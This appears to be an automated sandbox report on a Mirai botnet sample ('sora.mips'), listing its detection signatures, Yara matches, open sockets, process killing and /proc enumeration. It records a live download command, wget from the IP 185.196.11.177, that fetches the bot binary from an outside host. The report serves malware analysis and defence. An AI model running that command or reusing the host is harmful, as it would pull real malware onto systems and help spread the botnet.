Linux Analysis Report

Overview

General Information

Analysis ID:	1431999
Infos:

Detection

Mirai

Score:	68
Range:	0 - 100
Whitelisted:	false

Signatures

Malicious sample detected (through community Yara rule)

Yara detected Mirai

Drops files in suspicious directories

Sample deletes itself

Sample tries to kill multiple processes (SIGKILL)

Creates hidden files and/or directories

ELF contains segments with high entropy indicating compressed/encrypted content

Enumerates processes within the "proc" file system

Executes the "chmod" command used to modify permissions

Executes the "curl" command used to transfer data via the network (typically using HTTP/S)

Executes the "rm" command used to delete files or directories

Executes the "wget" command typically used for HTTP/S downloading

Reads the 'hosts' file potentially containing internal network hosts

Sample listens on a socket

Sample tries to kill a process (SIGKILL)

Sample tries to set the executable flag

Sets full permissions to files and/or directories

Uses the "uname" system call to query kernel version information (possible evasion)

Writes ELF files to disk

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Mirai	Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.	No Attribution	http://osint.bambenekconsulting.com/feeds/ http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/ https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html https://blog.netlab.360.com/another-lilin-dvr-0-day-being-used-to-spread-mirai-en/ https://blog.netlab.360.com/mirai_ptea-botnet-is-exploiting-undisclosed-kguard-dvr-vulnerability-en/	https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Signatures

Executes the "wget" command typically used for HTTP/S downloading

Source: /bin/sh (PID: 6216)

Wget executable: /usr/bin/wget -> wget http://185.196.11.177/bins/sora.mips

Jump to behavior

Reads the 'hosts' file potentially containing internal network hosts

Source: /usr/bin/curl (PID: 6214)

Reads hosts file: /etc/hosts

Jump to behavior

Sample listens on a socket

Source: /usr/bin/sora.mips (PID: 6220)	Socket: 0.0.0.0::0	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	Socket: 0.0.0.0::23	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	Socket: 0.0.0.0::53413	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	Socket: 0.0.0.0::80	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	Socket: 0.0.0.0::52869	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	Socket: 0.0.0.0::37215	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	Socket: 0.0.0.0::0	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	Socket: 0.0.0.0::23	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	Socket: 0.0.0.0::53413	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	Socket: 0.0.0.0::80	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	Socket: 0.0.0.0::52869	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	Socket: 0.0.0.0::37215	Jump to behavior

Source: sora.mips.14.dr

String found in binary or memory: http://upx.sf.net

System Summary

Malicious sample detected (through community Yara rule)

Source: 6229.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 6229.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 6221.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 6221.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 6418.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 6418.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 6412.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 6412.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 6414.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 6414.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 6227.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 6227.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 6218.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 6218.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 6220.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 6220.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: Process Memory Space: sora.mips PID: 6221, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: Process Memory Space: sora.mips PID: 6229, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: Process Memory Space: sora.mips PID: 6229, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: Process Memory Space: sora.mips PID: 6418, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: Process Memory Space: sora.mips PID: 6418, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown

Sample tries to kill multiple processes (SIGKILL)

Source: /usr/bin/sora.mips (PID: 6220)	SIGKILL sent: pid: 936, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 936, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 6220, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 720, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 721, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 759, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 777, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 1334, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 1335, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 1344, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 1860, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 1872, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 1886, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 2048, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 6189, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 6190, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 6229, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6414)	SIGKILL sent: pid: 6412, result: successful	Jump to behavior

Sample tries to kill a process (SIGKILL)

Source: /usr/bin/sora.mips (PID: 6220)	SIGKILL sent: pid: 936, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 936, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 6220, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 720, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 721, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 759, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 777, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 1334, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 1335, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 1344, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 1860, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 1872, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 1886, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 2048, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 6189, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 6190, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	SIGKILL sent: pid: 6229, result: successful	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6414)	SIGKILL sent: pid: 6412, result: successful	Jump to behavior

Yara signature match

Source: 6229.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 6229.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: 6221.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 6221.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: 6418.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 6418.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: 6412.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 6412.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: 6414.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 6414.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: 6227.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 6227.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: 6218.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 6218.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: 6220.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 6220.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: Process Memory Space: sora.mips PID: 6221, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: Process Memory Space: sora.mips PID: 6229, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: Process Memory Space: sora.mips PID: 6229, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: Process Memory Space: sora.mips PID: 6418, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: Process Memory Space: sora.mips PID: 6418, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16

Source: classification engine

Classification label: mal68.spre.troj.evad.lin@0/1@0/0

Creates hidden files and/or directories

Source: /bin/sh (PID: 6213)	Directory: /usr/bin/.			Jump to behavior
Source: /usr/bin/curl (PID: 6214)	Directory: /root/.curlrc			Jump to behavior

Enumerates processes within the "proc" file system

Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/491/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/793/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/772/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/796/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/774/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/797/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/777/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/799/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/658/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/912/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/759/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/936/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/918/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/1/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/761/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/785/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/884/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/720/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/721/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/788/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/789/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/800/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/801/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/847/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/904/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/4331/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/2033/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/2033/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1582/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1582/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/2275/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/3088/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/6190/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/6190/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1612/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1579/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1579/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1699/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1335/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1335/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1335/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1335/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1698/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/2028/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1334/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1334/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1334/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1334/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1576/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1576/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/2302/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/2302/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/3236/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/2025/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/2146/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/910/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/4444/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/4445/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/912/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/912/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/912/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/4446/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/6229/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/759/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/759/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/759/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/759/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/759/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/759/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/759/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/517/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/4447/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/2307/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/2307/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/918/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/918/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/918/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1594/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1594/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/2285/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/2285/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/2281/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/2281/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1349/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1349/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1623/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/761/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/761/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/761/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/761/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/761/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/761/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/761/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1622/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/884/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/884/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/884/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1983/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/2038/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/2038/exe	Jump to behavior

